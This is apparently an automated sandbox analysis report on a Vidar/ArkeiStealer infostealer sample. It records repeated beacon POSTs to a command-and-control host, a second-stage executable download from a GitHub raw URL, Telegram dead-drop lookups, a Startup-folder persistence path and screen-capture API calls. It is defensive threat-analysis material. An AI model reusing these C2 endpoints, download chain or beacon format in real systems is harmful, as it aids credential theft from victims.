                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: global trafficHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: file_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.174.62/
                        Source: file_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.174.62/1
                        Source: file_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.174.62/g
                        Source: file_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://94.130.174.62/n
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: http://certs.starfieldtech.com/repository/1402
                        Source: file_22613.exe, 00000011.00000002.512468530.0000000001526000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.481554520.0000000001526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.300951055.0000000002751000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430007815.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://north.ac
                        Source: 0XzeMRyE1e.exe, 0XzeMRyE1e.exe.7.drString found in binary or memory: http://north.ac/760
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: http://s.symcd.com06
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.300951055.0000000002751000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430007815.00000000026A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: 0XzeMRyE1e.exe, 0000000D.00000002.510921377.0000000003FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sigint.ws/f8dfksdj3/index.php
                        Source: 0XzeMRyE1e.exe, 0000000D.00000002.510921377.0000000003FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sigint.ws/f8dfksdj3/index.php2
                        Source: 0XzeMRyE1e.exe, 0000000D.00000002.510921377.0000000003FF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sigint.ws/f8dfksdj3/index.phpD%
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                        Source: file_22613.exe, 00000011.00000002.514054783.00000000038C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.305474377.0000000006872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: https://d.symcb.com/cps0%
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: https://d.symcb.com/rpa0
                        Source: file_22613[1].exe.13.dr, file_22613.exe.13.drString found in binary or memory: https://d.symcb.com/rpa0.
                        Source: file_22613.exe, 00000011.00000002.513954584.00000000037B0000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.478802065.0000000001519000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000002.511434019.00000000012F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                        Source: file_22613.exe, file_22613.exe, 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://mastodon.online/
                        Source: 0XzeMRyE1e.exe, 00000010.00000002.430045319.00000000026F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://north.ac/760
                        Source: 0XzeMRyE1e.exe, 00000000.00000002.300992280.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, 0XzeMRyE1e.exe, 00000010.00000002.430045319.00000000026F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://north.ac4
                        Source: file_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                        Source: file_22613.exe, 00000011.00000002.514627703.000000000D590000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.460609044.000000000D630000.00000040.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526539114.000000000F800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdiges
                        Source: file_22613.exe, file_22613.exe, 00000011.00000002.513954584.00000000037B0000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.478802065.0000000001519000.00000004.00000020.00020000.00000000.sdmp, file_22613.exe, 00000011.00000002.511434019.00000000012F8000.00000004.00000010.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdigest
                        Source: file_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdigestC
                        Source: file_22613.exe, 00000011.00000002.512252256.00000000014FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdigestH
                        Source: file_22613.exe, 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp, file_22613.exe, 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, file_22613.exe, 00000012.00000002.526917748.000000000F878000.00000002.00000001.00020000.00000000.sdmpString found in binary or memory: https://t.me/hyipsdigesthttps://mastodon.online/
                        Source: file_22613.exe, 00000011.00000002.511434019.00000000012F8000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
                        Source: unknownDNS traffic detected: queries for: north.ac
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00407FCB InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,13_2_00407FCB
                        Source: global trafficHTTP traffic detected: GET /760 HTTP/1.1Host: north.acConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /neiqops/ajajaj/main/file_22613.exe HTTP/1.1Connection: Keep-AliveHost: raw.githubusercontent.com
                        Source: global trafficHTTP traffic detected: GET /760 HTTP/1.1Host: north.acConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /hyipsdigest HTTP/1.1Host: t.me
                        Source: global trafficHTTP traffic detected: GET /760 HTTP/1.1Host: north.acConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /neiqops/ajajaj/raw/main/file_22613.exe HTTP/1.1Host: github.com
                        Source: global trafficHTTP traffic detected: GET /760 HTTP/1.1Host: north.acConnection: Keep-Alive
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.130.174.62
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.130.174.62
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.130.174.62
                        Source: unknownHTTP traffic detected: POST /f8dfksdj3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: sigint.wsContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                        Source: unknownHTTPS traffic detected: 172.67.152.230:443 -> 192.168.2.4:49759 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49766 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49767 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.152.230:443 -> 192.168.2.4:49782 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49893 version: TLS 1.2
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00402150 Sleep,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,GetMenuItemRect,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,13_2_00402150

                        System Summary

                        barindex
                        Source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                        Source: 17.3.file_22613.exe.d5d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
                        Source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                        Source: 17.2.file_22613.exe.14a3460.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
                        Source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                        Source: 17.2.file_22613.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
                        Source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                        Source: 18.2.file_22613.exe.f840000.1.unpack, type: UNPACKEDPEMatched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
                        Source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                        Source: 17.2.file_22613.exe.14a3460.2.unpack, type: UNPACKEDPEMatched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
                        Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                        Source: 00000011.00000003.465212965.000000000D5D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Vidar / ArkeiStealer Author: ditekSHen
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 0_2_00C9C1540_2_00C9C154
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 0_2_00C9E5780_2_00C9E578
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 0_2_00C9E5730_2_00C9E573
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_004228C813_2_004228C8
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_0042588713_2_00425887
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_0040412013_2_00404120
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00426ADD13_2_00426ADD
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00427A9013_2_00427A90
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_0042243013_2_00422430
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00416D7713_2_00416D77
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_0042576713_2_00425767
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_00C6C15416_2_00C6C154
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_00C6E56B16_2_00C6E56B
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_00C6E57816_2_00C6E578
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_0698DA1816_2_0698DA18
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_0698015816_2_06980158
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_0698016816_2_06980168
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_08924E7816_2_08924E78
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeCode function: 16_2_0892BB9816_2_0892BB98
